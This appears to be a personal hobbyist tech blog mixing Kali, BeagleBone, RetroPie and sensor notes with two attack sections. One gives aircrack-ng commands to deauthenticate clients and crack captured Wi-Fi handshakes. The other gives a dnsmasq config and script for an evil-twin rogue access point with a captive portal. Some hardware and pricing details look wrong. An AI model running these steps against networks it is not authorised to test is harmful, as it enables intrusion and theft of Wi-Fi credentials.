hashcat on AWS

HA_P2_GENERAL

Few months ago, I have installed GTX 1060 ti 6GB on desktop PC for using hashcat, but I found out that I rarely used hashcat to crack hash keys. Thus I decided to use AWS for cracking hashes. Kali (2019.03) distro is already in AWS market store. I selected US-West (Oregon) region with GPU enabled instance. I am using p2.xlarge and p3.2xlarge instances on Kali ; those are generally turned off and fair enough for my purposes.

It costs 0.9 CAD/h to 31,218 CAD/h with the Pay-As-You-Go rates depending on performance. The entry option is p2.xlarge(1* Tesla V100, 4 * vCPUs, 61GB RAM), and the highend option is p3dn.24xlarge(8 * Tesla V100, 256GB GPU Mem, 96 * vCPU with 768GB Mem)

https://aws.amazon.com/ec2/instance-types/p2/
https://aws.amazon.com/ec2/instance-types/p3/

CTF-forensics

I created 4 forensic challenges for CTF event. These might be interesting for someone who enjoy learning something.

Problems

1) What the *uck, where is my password?
Investigate file and identify stolen password

2) Hidden Personal Information
Find the leaked personal information

3) Meeting place
Investigate criminal’s meeting place and secure code

4) Ransome
Investigate raw disk image and recover those infected files

https://drive.google.com/file/d/1pvkNyMU_wDtySpxY1ms8onfoYSxNXhkz/view?usp=sharing

PRU and PWM – BBB

Component

  • 1 x BeagleBone Black
  • 1 x BreadBoard
  • 1 x Blue LED
  • 2 x Button
  • 1 x 330Ω Resistor
  • 2 x 1K Resistor
  • 7 x Connection cables

P9_2 – 330Ω – LED (10mm) – P9_14
P9_2 – 1KΩP – 9_23(GIPO_49) – Button 1
P9_4 – Button 1
P9_4 – Button 2
P9_2 – 1KΩP – 9_27(GIPO_115) – Button 2

Before I found out what Fritzing is, drawing connection map is time consuming work. This tool is intuitive and ease-to-use. We can import libraries for BeagleBone Black here.

Working Code

We can manipulate brightness of LED by implementing Pulse Width Modulation(PWM), thanks for the Python, integrating these modules were not too difficult. There are two buttons between circuits, it modifies Duty Cycles to change the LED brightness.

retropie

As Raspberry 4 is delivering form China, I turned legacy little gadget into retro gamebox just for fun. It could not too complex, but there were some trial errors as always.

retropie

PrE-requisite

Raspberry 3b+
SENS Game controllers
16GB+ Micro SD Card
Retropie images
Game Roms

Configuration

Most of setting can be left unchanged, but there might be some madatory changes required depending on environment.

setting:configuration->raspi-config->1.change user password
setting:configuration->raspi-config->2.network options->WiFi-setting
(need to make sure that the password for WiFi can not have a special character @)
setting:configuration->raspi-config->5.interfacing option->enable ssh

After rebooting, then install the lightdm for autologin
$sudo apt-get install lightdm
setting: configuration->raspi-config->3.boot options->4.desktop autologin

If HDMI interface is default for sound, there is no issue but when using 3.5mm analogue audio out, it requires additional configuration changes.

To get audio through the 3.5 jack: Retropie configuration > Audio > select option 2 (headphones – 3.5mm jack) > OK > restart system

Additional settings

for un-archiving Rom packages;
$apt-get install unrar-free p7zip

Downloading Roms

https://nblog.org/rompacks-romsets/
https://raspberrytips.com/download-retropie-roms/
https://github.com/RetroPie/RetroPie-Setup/wiki/First-Installation

enabling temperature sensor

Connection

Beaglebone DHT11

Connect 3 Pins of DH11 3.3V,  ground and P8_11 headers, for DHT11 sensor initialization by reference of BeagleBone Black’s cape expansion headers information

DH11 specifications

Download Python Library for DHT

Adafruit Python DHT Sensor Library

Python3
$sudo apt-get update 
$sudo apt-get install python3-pip 
$sudo python3 -m pip install --upgrade pip setuptools wheel

Setup Library
$sudo pip3 install Adafruit_DHT

Examine CODES

$sudo python3 ./AdafruitDHT.py 11 P8_11
Temp=21.0* Humidity=39.0%

#!/usr/bin/python
import sys
import Adafruit_DHT

sensor=11
pin="P8_11"

while True:
    humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)
    print('Temp={0:0.1f}*  Humidity={1:0.1f}%'.format(temperature, humidity))

Displaying on LED 7 Segments

Cracking Wi-fi Password (classic)

Procedure

Scanning->Capturing/De-authorization handshake packet->Cracking

Scanning

#airmon-ng check kill
#airmon-ng start wlan0mon
#airodump-ng wlan0mon

Capturing/De-authorization

#airodump-ng –bssid MACADDRESS -c Channel –write DUMPFILE wlanmon0
#aireplay-ng –deauth 100 -a MACADDRESS wlanmon0 (for deauthorization if required)

Cracking/Brute-forcing

#aircrack-ng DUMPFILE -w WORDLIST

build rogue AP

https://dalewifisec.wordpress.com/2013/05/16/evil-twin-access-point-attack-explained/

dnsmasq.conf

interface=wlan0mon
address=/#/10.10.12.1
dhcp-range=10.10.12.2,10.10.12.254,255.255.255.0,1h
dhcp-option=3,10.10.12.1
dhcp-option=6,10.10.12.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Procedure.sh

sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo rghostapd -i "wlan0mon" --ssid "secured" -c 6 -pK "SecretPassword"
sudo ifconfig wlan0mon up 10.10.12.1 netmask 255.255.255.0
sudo route add -net 10.10.12.0 netmask 255.255.255.0 gw 10.10.12.1
sudo killall dnsmasq
sudo dnsmasq -C /root/ghostap/dnsmasq.conf -d


sudo sysctl net.ipv4.ip_forward=1
sudo iptables-legacy --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
sudo iptables-legacy --append FORWARD --in-interface wlan0mon -j ACCEPT
#config : /etc/nginx/sites-enabled/captive_portal
sudo service nginx start

small tips (workaround)

When failing apt-get update or upgrade

$sudo apt-get install ntpdate
$sudo ntpdate -v pool.ntp.org 

Enabling Promiscuous mode

 sudo ifconfig eth0 promisc

auto starting ssh service

systemctl enable ssh.service

VM fusion full resolution for linux(kali)

apt-get install open-vm-tools-desktop fuse

https://www.kali.org/docs/virtualization/install-vmware-tools-kali-guest/

Proxy switcher

https://null-byte.wonderhowto.com/how-to/use-burp-foxyproxy-easily-switch-between-proxy-settings-0196630/

“inconsistent use of tabs and spaces in indentation” in Python

$autopep8 -i my_file.py

vmmon not found

vmware-modconfig --console --install-all
ref:https://kb.vmware.com/s/article/1002411

Set timezone
$sudo timedatectl set-timezone list
$sudo timedatectl set-timezone America/Edmonton